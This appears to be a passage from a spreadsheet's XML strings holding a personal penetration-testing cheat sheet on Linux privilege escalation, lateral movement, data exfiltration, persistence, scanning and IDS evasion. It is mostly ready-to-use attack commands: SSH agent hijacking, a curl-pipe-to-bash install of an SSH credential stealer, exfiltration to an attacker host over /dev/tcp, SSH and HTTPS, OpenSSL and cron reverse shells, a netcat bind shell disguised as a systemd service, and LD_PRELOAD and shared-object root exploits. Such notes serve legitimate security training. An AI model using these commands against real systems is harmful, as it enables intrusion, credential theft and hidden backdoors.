cat /docker/test.txt </t>
  </si>
  <si>
    <t>https://www.exploit-db.com/exploits/40962
https://github.com/rapid7/metasploit-framework/pull/9408/files
Use Docker to grab the shadow file</t>
  </si>
  <si>
    <t>Pivoting/ Lateral Movement</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Requires that the compromised box has an active SSH session established to another box via Public Key Authentication
Process:
1 - determine SSH process ID of the user on the compromised host - ps aux |grep sshd
2 - determine SSH_AUTH_SOCK environment variable for the sshd PID - grep SSH_AUTH_SOCK /proc/&lt;PID&gt;/environ
3 - Hijack the targets ssh-agent socket - SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh-add -1
4 - Log into the remote system our victim is logged into as the target - ssh &lt;target_ip&gt; -l &lt;victim_name&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1184/
https://xorl.wordpress.com/2018/02/04/ssh-hijacking-for-lateral-movement/</t>
  </si>
  <si>
    <t>Service Credentials</t>
  </si>
  <si>
    <t xml:space="preserve">Steal SSH creds via PAM module. Every SSH connection attempt will be forwarded to a server under your control. 
1 - git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter
2 - On the compromised machine - curl http://&lt;attackerserver_ip&gt;:&lt;port&gt;/install.sh | bash 
</t>
  </si>
  <si>
    <t>https://mthbernardes.github.io/persistence/2018/02/10/stealing-ssh-credentials-another-approach.html</t>
  </si>
  <si>
    <t>tdbdump /var/lib/samba/private/secrets.tdb</t>
  </si>
  <si>
    <t>https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9</t>
  </si>
  <si>
    <t>VPNPivot</t>
  </si>
  <si>
    <t xml:space="preserve">Creates a VPN tunnel between the attacker and compromised linux host, and allows pivoting to other hosts internally within an organisation that may be behind firewalls, NAT configs etc </t>
  </si>
  <si>
    <t>https://github.com/0x36/VPNPivot</t>
  </si>
  <si>
    <t>Firefox</t>
  </si>
  <si>
    <t xml:space="preserve">Firefox creates a default user for the user. 
Can be found in - /home/user/.mozilla/firefox -&gt; it is a folder with &lt;random alphanumeric values&gt;.default
Passwords are in login.json
Use firefox_decrypt.py to dump the creds. </t>
  </si>
  <si>
    <t>Dump the credentials that a Linux user has stored in their firefox browser
https://github.com/unode/firefox_decrypt/blob/master/firefox_decrypt.py</t>
  </si>
  <si>
    <t>Data Exfiltration</t>
  </si>
  <si>
    <t>EBCDIC and Base64 Exfil</t>
  </si>
  <si>
    <t>Process:
1 - Configure netcat listener to receive the tar file - nc -nlvp 80 &gt; datafolder.tmp
2 - On compromised box, tar the datafolder and redirect it to our attacker machine 
tar zcf - /tmp/&lt;datafolder_name (contains the data)&gt; | base64 | dd conv=ebcdic &gt; /dev/tcp/&lt;attacker_ip&gt;/80
3 - On attacker machine, decode the received datafolder.tmp file from EBCDIC to ASCII, and decode Base64 
dd conv=ascii if=datafolder.tmp |base64 -d &gt; datafolder.tar 
4 - extract the tar file
tar xf datafolder.tar</t>
  </si>
  <si>
    <t>Archive the data, encode it with Base64 and EBCDIC and then send the archive to attacker system over TCP socket</t>
  </si>
  <si>
    <t>SSH Exfil</t>
  </si>
  <si>
    <t>1 - tar zcf - /tmp/datafolder | ssh root@&lt;attacker_ip&gt; "cd / tmp; tar zxpf -"
2 - Browse to /tmp/datafolder on attacker ip</t>
  </si>
  <si>
    <t xml:space="preserve">Tars the contents of a datafolder, sends to attacker via ssh, then untars the pack.
</t>
  </si>
  <si>
    <t>HTTPS Exfil</t>
  </si>
  <si>
    <t>1 - Create a php file that will write data being received as a POST request to a file called /tmp/datafolder.base64. Call the file 'contact.php'. This php file contains the below:
&lt;?php file_put_contents('/tmp/datafolder.base64', file_get_contents('php://input')); ?&gt;
2 - Issue curl command from victim machine
curl --data "$(tar zcf - /tmp/datafolder | base64)" https://&lt;attacker_ip&gt;/contact.php
3 - Attacker machine receives data and is written to the /tmp/datafolder.base64 file. Decode and tar then extract
cat /tmp/datafolder.base64 | base64 -d &gt; datafolder.tar &amp;&amp; tar xf datafolder.tar</t>
  </si>
  <si>
    <t xml:space="preserve">POST base64 encoded data over HTTPS to a web server that we control. Assumes we have a webserver w/ php installed and ssl cert installed. </t>
  </si>
  <si>
    <t>Maintaining Access and Persistence</t>
  </si>
  <si>
    <t>Reverse Shell</t>
  </si>
  <si>
    <t xml:space="preserve">Victim connects to the attacker machine and gives us a shell </t>
  </si>
  <si>
    <t>OpenSSL</t>
  </si>
  <si>
    <t xml:space="preserve">1 - On attacker machine  we generate an SSL certificate pair for our listener on the attack machine:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -&gt; will create two files key.pem and cert.pem 
2 - Start listener on attack machine:
openssl s_server -quiet -key key.pem -cert cert.pem -port 443 -&gt; starts a listener on port 443 with a certificate
3 - On target system, create our mkfifo named pipe as a file called 'x' in /tmp and use openssl to connect back to your host:
mkfifo /tmp/x; /bin/sh -i &lt; /tmp/x 2&gt;&amp;1 \ | openssl s_client -connect &lt;attacker_ip&gt;:443 &gt; /tmp/x; rm /tmp/x </t>
  </si>
  <si>
    <t>Create a reverse shell using OpenSSL</t>
  </si>
  <si>
    <t>icmpsh</t>
  </si>
  <si>
    <t>ICMP</t>
  </si>
  <si>
    <t xml:space="preserve">Create a reverse shell using Icmpsh tool. </t>
  </si>
  <si>
    <t xml:space="preserve">Links: pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/
</t>
  </si>
  <si>
    <t>Stageless/ staged handlers</t>
  </si>
  <si>
    <t xml:space="preserve">https://buffered.io/posts/staged-vs-stageless-handlers/
</t>
  </si>
  <si>
    <t>Xinetd UDP Portknock Backdoor</t>
  </si>
  <si>
    <t>Process:
1 - On target, create custom xinetd service. Run below script on target host:
https://gist.github.com/anonymous/3cb8e474b6bb3fd3787bda1e1a55cf56 -&gt; ensure to modify the attacker_ip and attacker_port in the shellcode settings
2 - On attacker, start nc listener w/ the same port as you defined in the above script:
nc -nlvp 4444
3 - Use hping3 to send a single UDP packet to port 65534 (where our script is listening on the target) to the target
hping3 -2 -c 1 &lt;target_ip&gt; -p 65534</t>
  </si>
  <si>
    <t>Utilize the built in xinetd daemon. 
Create a custom xinetd service listening on a UDP port, then initiate a netcat reverse shell</t>
  </si>
  <si>
    <t>Reverse Shell, Persistence</t>
  </si>
  <si>
    <t>Systemd Netcat Bind Shell</t>
  </si>
  <si>
    <t>Process:
1 - On target, copy the /bin/nc executable to the /lib/systemd directory and call it systemd-service
cp /bin/nc /lib/systemd/systemd-service
2 - On target, create a file called /lib/systemd/system/systemd.service and add the below contents:
[Unit]
Description = Systemd Service
After = network.target
[Service]
ExecStart = /lib/systemd/systemd-service -lvp 56825 -e /bin/sh
[Install]
WantedBy = multi-user.target
The above creates a bind shell on port 56825
4 - Start the bind shell service
systemctl enable systemd.service
systemctl start systemd.service
5 - Confirm the shell is listening:
netstat -auntp |grep 56825
6 - On attacker machine, connect to the target port and see if got shell</t>
  </si>
  <si>
    <t>Bind Shell</t>
  </si>
  <si>
    <t xml:space="preserve">An attacker directly connects to a port and is greeted with a shell. </t>
  </si>
  <si>
    <t>Shell Upgrade</t>
  </si>
  <si>
    <t>python -c ‘import pty; pty.spawn(“/bin/bash”)</t>
  </si>
  <si>
    <t xml:space="preserve">Use this python one liner to get a proper shell, rather than meterpreter etc. </t>
  </si>
  <si>
    <t>fcrackzip</t>
  </si>
  <si>
    <t>Use to crack locked zip files
fcrackzip -v -D -u -p &lt;wordlist filepath&gt; &lt;zip filepath&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">1. zip2john &lt;zipfile&gt; &gt; zip.hash
2. john zip.hash
3. Should crack
4. 7z e &lt;zip file&gt; -&gt; enter the password. </t>
  </si>
  <si>
    <t>When we have a password locked zip files, just use john and follow the process.</t>
  </si>
  <si>
    <t xml:space="preserve">Dump private keys or user/pass. </t>
  </si>
  <si>
    <t>catme</t>
  </si>
  <si>
    <t>Same as cat</t>
  </si>
  <si>
    <t>On victim: $python -m SimpleHTTPServer &lt;port&gt; 
On attacker: use wget &lt;ip&gt;:&lt;port&gt;/&lt;file&gt; or browse to server on browser</t>
  </si>
  <si>
    <t xml:space="preserve">Simple python HTTP Server
</t>
  </si>
  <si>
    <t>mysql</t>
  </si>
  <si>
    <t>If we see mysql being run as root, do the below or follow try hack me linuxprivesc box.  
https://www.exploit-db.com/exploits/1518</t>
  </si>
  <si>
    <t>ps -elf | grep root</t>
  </si>
  <si>
    <t>Determine which services are running as root.</t>
  </si>
  <si>
    <t>MySql</t>
  </si>
  <si>
    <t xml:space="preserve">User Defined Function - SQL </t>
  </si>
  <si>
    <t>https://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html</t>
  </si>
  <si>
    <t>LD_PRELOAD</t>
  </si>
  <si>
    <t>Sudo can be configured to inherit certain environment variables from the users environment. 
1. Sudo -l -&gt; see if LD_PRELOAD or other env variables are available under Matching Defaults entry
2. In the case of LD_PRELOAD:
Create a c files with the below code in the /tmp file:
#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;stdlib.h&gt;
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
3. Nav to /tmp/ and run the below to get root:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so find
id</t>
  </si>
  <si>
    <t>https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/</t>
  </si>
  <si>
    <t>Cron Jobs</t>
  </si>
  <si>
    <t xml:space="preserve">Cron Jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files store the config for cron jobs. System-wide crontab is located at /etc/crontab
If we can overwrite/ read/write a cron job file (check the perms on each cronjob file location) -&gt; we can add a script in there to connect to our netcat listener:
#!bin/bash
bash -i &gt;&amp;/dev/tcp/&lt;attacker_ip&gt;/&lt;attackerport&gt; 0&gt;&amp;1
Launch netcat listener
</t>
  </si>
  <si>
    <t>Cron Jobs - PATH Environment Variable
Check the crontab PATH variable (at the top). If it is set to /home/user we can create a file with the same name as the cronjob script in that folder. This will execute before the real script, but it must have the same name. 
Create a file with the below:
cp /bin/bash /tmp/bash; chmod +xs /tmp/bash
Wait for cronjob to run and run /tmp/rootbash -p to get a shell
Ensure the file is executable</t>
  </si>
  <si>
    <t xml:space="preserve">Cron Jobs - Wildcards
Check all cronjob files for wildcards -&gt; check linuxprivesc tryhackme box
Check crontab -&gt; cat the cronjob and check for wildcards 
3. Execute the below:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash/' &gt; /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
4. Wait for bash script to execute
5. /tmp/bash -p
</t>
  </si>
  <si>
    <t xml:space="preserve">Shared Object Library </t>
  </si>
  <si>
    <t xml:space="preserve">https://www.contextis.com/en/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library
Check the above link for the full process. </t>
  </si>
  <si>
    <t>Files</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">History files = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">cat ~/.*history | less
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Config Files = </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">SO Injection:
Check that a binary with SUID perms loads .so files correctly:
strace &lt;SUID-BINARY&gt; 2&gt;&amp;1 | grep -i -E "open|access|no such file"
If the above says something like &lt;directory&gt; =-1 ENOENT (No Such file or directory) -&gt; we can exploit this by putting a malicious file in the directory path it is looking for. 
Use the below c code and comppile it, then place to the directory
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
static void inject() __attribute__((constructor));
void inject(){
system("cp /bin/bash /tmp/bash &amp;&amp; chmod +s /tmp/bash &amp;&amp; /tmp/bash -p");}
Compile:
gcc -shared -o &lt;missing directory, file.so&gt; -fPIC &lt;location of the above c code&gt;
</t>
  </si>
  <si>
    <t>Steal/ Find SSH Key</t>
  </si>
  <si>
    <t>find / -name authorized_keys &gt;/dev/null
find / -name id_Rsa 2&gt;/dev/null
Try to find /home/&lt;user&gt;/.ssh/id_rsa</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Find id_rsa files with root keys. Save this key into a text file on the attacker system. Then use </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">ssh -i &lt;rootkey path&gt; root@&lt;victim_ip&gt; to gain ssh shell
</t>
    </r>
  </si>
  <si>
    <t>SUID Binaries SymLink</t>
  </si>
  <si>
    <t>nginx example on tryhackme - linux privesc arena</t>
  </si>
  <si>
    <t xml:space="preserve">SUID Binaries Environment Variables </t>
  </si>
  <si>
    <t xml:space="preserve">Process: Check cyber mentor tryhackme
1. Use find / -perm command to find SUID Binaries, and investigate non-standard binaries
2. Run strings &lt;BINARY PATH&gt; 
3. Check if any services do not properly define a PATH (i.e service apache2 start) or if the full path i.e. /usr/bin/curl) is not shown
4. In CMD line
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' &gt; /tmp/service.c &lt;or name of incorrectly defined service (the first word)
5. CMD: gcc /tmp/service.c -o /tmp/service
6. CMD: export PATH=/tmp:$PATH
7. Run the vulnerable SUID binary
</t>
  </si>
  <si>
    <t>NFS</t>
  </si>
  <si>
    <t>no_root-squash:
1. cat /etc/exports
If "no_root_squash" option is defined for the "/tmp" or any other export export, we can exploit. 
2. showmount -e &lt;victim_ip&gt;
3. mkdir /&lt;directory w no squash&gt;/1
4. mount -o rw,vers=2 &lt;victim_ip&gt;:&lt;directory with no squash&gt; &lt;directory w no squash&gt;/1
5. cd to the new mount and cp /bin/bash to the mount
6. chmod +s bash
7. Execute the bash</t>
  </si>
  <si>
    <t>https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/</t>
  </si>
  <si>
    <t>no_root_squash
no_all_squash</t>
  </si>
  <si>
    <t>Scanning</t>
  </si>
  <si>
    <t>nmap -sS &lt;target_ip&gt; &lt;port&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Stealth Scan. Does not open a full TCP connection. </t>
  </si>
  <si>
    <t xml:space="preserve">nmap -sT </t>
  </si>
  <si>
    <t xml:space="preserve">Full TCP handshake scan. Less efficient. </t>
  </si>
  <si>
    <t>nmap -sU</t>
  </si>
  <si>
    <t>UDP Scan. Slower</t>
  </si>
  <si>
    <t>Idle/ Zombie Scan</t>
  </si>
  <si>
    <t xml:space="preserve">Process:
1. Find a zombie that assigns IP ID both incrementally and globally. 
2. Find an idle zombie, meaning that there should be no other traffic on the zombie that will disturb the IP ID. 
Use the below command to determine if the IP ID sequence generation is incremental. 
nmap -O -v &lt;zombie_ip&gt;
OR use a script to automatically detect if a machine is a good zombie candidate:
nmap --script ipidseq &lt;zombie_ip&gt; -p &lt;open port&gt; 
If incremental = good. 
3. Use the below nmap scan to use a zombie to scan our target:
nmap -Pn -sI &lt;zombie_ip&gt;:&lt;zombie_port&gt; &lt;target_ip&gt; -p &lt;target_port&gt; -v (verbosity)
If the output on the zombie is id+2, we know that the target port is open. If 1 then port is closed. </t>
  </si>
  <si>
    <t xml:space="preserve">A zombie is a host that is not receiving or sending packets. 
Utilise a zombie to send packets to a target on behalf of us, i.e. We never get detected. 
https://nmap.org/book/idlescan.html
</t>
  </si>
  <si>
    <t>Bounce Scan</t>
  </si>
  <si>
    <t>21 - File Transfer Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">nmap -b </t>
  </si>
  <si>
    <t xml:space="preserve">Exploits an FTP Servers "PORT" command to launch scans from the FTP server to other machines on the network, if we dont have direct access to those machines/ </t>
  </si>
  <si>
    <t>Null, FIN, XMAS Scans</t>
  </si>
  <si>
    <t xml:space="preserve">-sN = NULL - Does not set any bits (TCP flag header is 0)
-sF = FIN - Only sets the TCP FIN bit
-sX - XMAS scan - sets the FISH, PSH, and URG flags. </t>
  </si>
  <si>
    <t>Firewall/ IDS Evasion - Fragmentation</t>
  </si>
  <si>
    <t>nmap -sS -f &lt;target_ip&gt; --data-length &lt;byte size i.e. 48&gt; use smaller to get more packets
Can add another -f to split up the packets again</t>
  </si>
  <si>
    <t>This fragments the packets to evade a firewall.
Does not work for sT or sV. 
https://nmap.org/book/man-bypass-firewalls-ids.html</t>
  </si>
  <si>
    <t>Firewall/ IDS Evasion - Decoys</t>
  </si>
  <si>
    <t xml:space="preserve">nmap -sS -D &lt;decoy1_ip&gt;,&lt;decoy2_ip&gt; etc, ME(our IP) &lt;target_ip&gt; 
Can use RND:&lt;number of decoys&gt; too </t>
  </si>
  <si>
    <t xml:space="preserve">Aim of decoys is to add noise to the IDS by sending scans from spoofed IP addresses. A list of forged Ips will appear on the IDS along with the real attacker IP.
Does not work with -sT or -sV </t>
  </si>
  <si>
    <t>Firewall/ IDS Evasion - Timing</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">nmap -sS -T[0-5] &lt;target_ip&gt; --max-retries 1 (tells nmap how many times to send again if host does not respond)
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>O = 5 mins
1 = 15 sec
2 = 0-4 sec
3 = Default
4 = 10 ms
5 = 5 ms</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Slows down the scan in order to blend in with other traffic. </t>
  </si>
  <si>
    <t>Firewall/ IDS Evasion - Source Port</t>
  </si>
  <si>
    <t xml:space="preserve">nmap -sS --source-port &lt;port&gt; &lt;target_ip&gt;
can also use -g &lt;port&gt;
Use port 53, as most networks allow for DNS traffic across all hosts. </t>
  </si>
  <si>
    <t xml:space="preserve">Used to mimic a specific port. i.e. A machine may only allow connects from port 20, 53 etc. 
Change our source port in order to bypass this restriction. 
</t>
  </si>
  <si>
    <t>hping</t>
  </si>
  <si>
    <t xml:space="preserve">hping -S -r -p &lt;port&gt; &lt;target_ip&gt;
IF output has id+1 we are good.This means the zombie does not send or receive other communications. 
Use the below to scan a target with the zombie.
Hping3 -a &lt;zombie_ip&gt; -S -p &lt;target_port&gt; &lt;target_ip&gt;
If the output on the zombie is id+2, we know that the target port is open. If 1 then port is closed. </t>
  </si>
  <si>
    <t>Firewall/ IDS Evasion - Append Random Data</t>
  </si>
  <si>
    <t>nmap -sS --data-length 10 &lt;target_ip&gt; &lt;port&gt;</t>
  </si>
  <si>
    <t>Firewall/ IDS Evasion - MAC Address Spoofing</t>
  </si>
  <si>
    <t xml:space="preserve">nmap --spoof-mac &lt;vendor i.e. Apple, dell&gt; &lt;target_ip&gt; -p &lt;port&gt; --disable-arp-ping
Random MAC = 0, </t>
  </si>
  <si>
    <t xml:space="preserve">Useful for when the firewall blocks our MAC or only accepts packets from specific MAC addresses. </t>
  </si>
  <si>
    <t>Firewall/ IDS Evasion - Randomise Host during Scan</t>
  </si>
  <si>
    <t>nmap -iL &lt;list with random hosts&gt; -sS -p &lt;ports&gt; --randomize-hosts</t>
  </si>
  <si>
    <t>Ping Sweep</t>
  </si>
  <si>
    <t xml:space="preserve">nmap -sn -PE &lt;target_ip&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">137 - NetBIOS Name Service - Maps a NetBIOS name (16 bytes) to an IP Address
138 - NetBIOS Datagram Service - Permits sending of messages to a NetBIOS name. 
139 - NetBIOS Sessions Service - Allows two names to establish a connection and exchange data. Once session established, the SMB protocol is used. </t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t xml:space="preserve">netstat -n </t>
  </si>
  <si>
    <t>Show netBIOS names on machine</t>
  </si>
  <si>
    <t>nbtstat</t>
  </si>
  <si>
    <t>nbtstat -a</t>
  </si>
  <si>
    <t xml:space="preserve">Gather NetBIOS information about remote machine.
&lt;20&gt; = a server service -&gt; meaning file and printer shares are enabled. We may be able to access these. 
 </t>
  </si>
  <si>
    <t>nbtscan</t>
  </si>
  <si>
    <t xml:space="preserve">nbtscan -v &lt;target_ip&gt; </t>
  </si>
  <si>
    <t>net view</t>
  </si>
  <si>
    <t>net view &lt;target_ip&gt;</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Lists domains, computers, and resources shared by a computer on the network. Use the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">net use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">command to browse to these resources. </t>
    </r>
  </si>
  <si>
    <t>net use (mount windows shares)</t>
  </si>
  <si>
    <t>net use K: &lt;target_ip&gt;\&lt;resource i.e. C&gt;
The above adds the remote machines C resources to our K drive (on our pc). We can access this share via the command line also by typing &lt;resource: i.e. K:&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Used to connect or disconnect a computer from a shared resource. We can connect our pc to the remote shared folder in order to navigate. </t>
  </si>
  <si>
    <t xml:space="preserve">Null Session </t>
  </si>
  <si>
    <t>net use \\&lt;target_ip&gt;\IPC$ ""/u:""</t>
  </si>
  <si>
    <t xml:space="preserve">Connect to the IPC$ share using a null session on Windows. </t>
  </si>
  <si>
    <t>Winfingerprint</t>
  </si>
  <si>
    <t xml:space="preserve">Network resource scanner to gather information about each host in the network. </t>
  </si>
  <si>
    <t xml:space="preserve">GUI tool. Executive with admin privs. </t>
  </si>
  <si>
    <t>Wininfo</t>
  </si>
  <si>
    <t>wininfo &lt;target_ip&gt; -n</t>
  </si>
  <si>
    <t>nat</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Attempt to connect to an access restricted share. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Nat.exe -u &lt;userlist&gt; -p &lt;passlist&gt; &lt;target_ip&gt; </t>
    </r>
  </si>
  <si>
    <t>DumpSec</t>
  </si>
  <si>
    <t xml:space="preserve">Automatically dumps usernames, filesystem, groups, registry. GUI or command line. </t>
  </si>
  <si>
    <t>161 (UDP) - SNMP</t>
  </si>
  <si>
    <t xml:space="preserve">SNMP is used for exchanging management information between network devices. There is a manager and a number of agents. 
Community string = password 
Private strings = allow access to "write" rights
Public strings = allow for "read" rights on the system. </t>
  </si>
  <si>
    <t xml:space="preserve">Four SNMP commands:
- Read: Monitor devices
- Write: Configure and change device settings
- Trap: trap events from the device and report the back to the monitoring system
- Traversal Operations: Determine what variables a certain device supports. </t>
  </si>
  <si>
    <t>Sniffing SNMP Community Strings</t>
  </si>
  <si>
    <t>Capture SNMP community strings in cleartest (v1 and v2)</t>
  </si>
  <si>
    <t>snmpwalk</t>
  </si>
  <si>
    <t>snmpwalk -v &lt;version i.e. 2c&gt; &lt;target_ip&gt; -c &lt;community string to use i.e. Public&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Uses SNMP GETNEXT requests to gather information. 
If output returns OID numerically, download the snmp-mibs-downloader package. </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">snmpwalk -v &lt;version i.e. 2c&gt; &lt;target_ip&gt; -c &lt;community string to use i.e. Public&gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>hrSWInstalledName</t>
    </r>
  </si>
  <si>
    <t>Show installed software on the machine</t>
  </si>
  <si>
    <t>snmpset</t>
  </si>
  <si>
    <t xml:space="preserve">snmpset uses SNMP SET requests to set or change information on a network entity. Must give an OID as an argument. 
Process:
1. Check the current value for a specific object using snmpwalk
snmpwalk -v 2c -c public &lt;ip&gt; &lt;OID i.e. System.sysContact.0 value&gt; 
Output = STRING: admin@whatever.com
2. Set the new value 
snmpset -v 2c -c public &lt;ip&gt; &lt;OID i.e. system.sysContact.0) s &lt;new value i.e newadmin@whatever.com&gt; 
3. Rerun smpwalk and check the new value
</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Nmap has a number of scripts to enumerate snmp. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Nav to /usr/share/nmap/scripts and ls -l | grep -i snmp to list all available. 
Nmap -sU -p 161 &lt;script etc..&gt; </t>
    </r>
  </si>
  <si>
    <t>162 (UDP) - SNMP</t>
  </si>
  <si>
    <t>nmap --script-args snmp-brute.communitiesdb=&lt;own wordlist&gt;</t>
  </si>
  <si>
    <t>Use a custom wordlist with the snmp-brute script on nmap</t>
  </si>
  <si>
    <t>nmblookup</t>
  </si>
  <si>
    <t>nmblookup -A &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>use auxiliary/scanner/smb/smb_login</t>
  </si>
  <si>
    <t>Metasploit module to bruteforce  SMB login to shares</t>
  </si>
  <si>
    <t>nmap --script smb-brute -p445 &lt;target_ip&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">NetBIOS, SMB and Samba - Enumeration Process:
1. Display the NetBIOS name table using nbtstat or nmblookup
2. Try to access the shared files and folders using a null session
3. If none, try to brute force the credentials using SMB Login module in metasploit
</t>
  </si>
  <si>
    <t>use exploit/windows/smb/psexec</t>
  </si>
  <si>
    <t xml:space="preserve">Once smb creds have been found - run this exploit to gain a meterpreter shell. </t>
  </si>
  <si>
    <t>IMPORTANT</t>
  </si>
  <si>
    <t>snmpenum</t>
  </si>
  <si>
    <t>Use to enumerate snmp on a target. Perl script. Convert the text files that come with the script to Unix (dos2unix)</t>
  </si>
  <si>
    <t>Process</t>
  </si>
  <si>
    <t xml:space="preserve">We can enumerate NetBIOS/ SMB shares in order to retrieve information and possibly exploit the machine.
1. Scan for ports 139 and 445
2. Display the NetBIOS name table. &lt;20&gt; signifies that file and folder sharing is enabled. 
Tools: nbstat -a (win), nmblookup -A &lt;ip&gt; (lin)
3. Attempt a NULL session on the target
Tools: net use (win), smbclient -L &lt;ip&gt; (lin)
Sometimes the session may work, however there may be lack of privileges on the Anonymous user and we cannot view the shares
IF shares are shown, skip to step X
4. Brute force the machine for SMB credentials
Tools: metasploit (auxiliary/scanner/smb/smb_login)
5. With credentials, enumerate the shares on the host
Tools: nmap --script-smb-enum-users (lin), smbclient etc, net use (win)
6. Mount the shares to your machine and enumerate
7. [OPTIONAL] Exploit the machine
If we have working credentials, we can expoit the machine with:
Tools: metasploit (exploit/windows/smb/psexec
We gain a meterpreter shell
From here we can do host discovery and find hosts not previously shown to use using:
Tools: autoroute, metasploit (auxiliary/scanner/portscan/tcp)
We can also change our tokens to impersonate other users on the compromised host, to gain access to other shares within the network or run specific tools such as net view (win):
Tools: meterpreter (use incognito -&gt; list_tokens -u -&gt; impersonate_token &lt;token/ user&gt;
</t>
  </si>
  <si>
    <t>dpkg</t>
  </si>
  <si>
    <t>Sudo Privileged Access/ Run apps as root and gain shell</t>
  </si>
  <si>
    <t>Run dpkg -l.
If can run an app as root -&gt; check gtfo bins for a quick win</t>
  </si>
  <si>
    <t>Active Sniffing</t>
  </si>
  <si>
    <t xml:space="preserve">Injecting packets onto the network in order to redirect traffic. </t>
  </si>
  <si>
    <t>Passive Sniffing</t>
  </si>
  <si>
    <t xml:space="preserve">Attacks performed by just watching the packets on a network to gather information such as userids, passwords etc. </t>
  </si>
  <si>
    <t>MAC Flooding</t>
  </si>
  <si>
    <t xml:space="preserve">Fill up the switches CAM table. CAM table keeps all the info required to forward frames to the correct port. 
CAM table maps MAC addresses to the physical ports on the switch. 
When the space in the CAM is filled with fake MAC addresses, the switch cannot learn new MAC addresses. </t>
  </si>
  <si>
    <t>ARP Poisoning/ Spoofing</t>
  </si>
  <si>
    <t xml:space="preserve">ARP matches IP addresses (Layer 3) with MAC Addresses (Layer 2). 
Redirects traffic. Mostly used to perform MiTM. 
Redirects the traffic of the victim to an attacker machine. 
ARP is used when:
- A host wants to send a packet to another host in the same network
- Host wants to reach another host beyond the LAN, and needs the gateway hardware address
- Router needs to forward a packet for one host through another router
- Router need to forward a packet to the destination host on the same network </t>
  </si>
  <si>
    <t xml:space="preserve">Technical Details:
Two types of ARP Packets:
- ARP Request
- ARP Reply
ARP Table stores the IP-MAC Pairs and a time to live value related to each entry. 
If an entry is not found on the ARP table, an ARP Request is sent out over the LAN via a Broadcast Message:
Source ip, source mac, destination ip, destination mac [FF:FF:FF:FF:FF:FF] &lt;- indicates unknown mac
Who has IP xyz and what is your mac
Correct host then sends an ARP Reply with its mac. </t>
  </si>
  <si>
    <t xml:space="preserve">arp -a </t>
  </si>
  <si>
    <t>Check the ARP table</t>
  </si>
  <si>
    <t xml:space="preserve">Gratious ARP </t>
  </si>
  <si>
    <t xml:space="preserve">Gratuitous ARP
Request: A request packet where source and destination IP are set with the IP of the machine that is issuing the packet and the destination mac is the broadcast address
